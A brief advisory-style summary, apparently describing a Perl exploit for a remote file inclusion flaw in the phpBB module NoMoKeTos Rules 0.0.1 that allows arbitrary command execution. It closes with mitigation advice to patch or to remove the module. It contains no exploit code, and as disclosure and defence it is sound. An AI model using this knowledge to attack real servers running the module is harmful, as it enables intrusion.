This is a Perl script that exploits a remote file inclusion vulnerability in the phpBB Module NoMoKeTos Rules 0.0.1. It allows an attacker to include a remote file and execute arbitrary commands on the target server.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users are advised to remove or disable the vulnerable module.
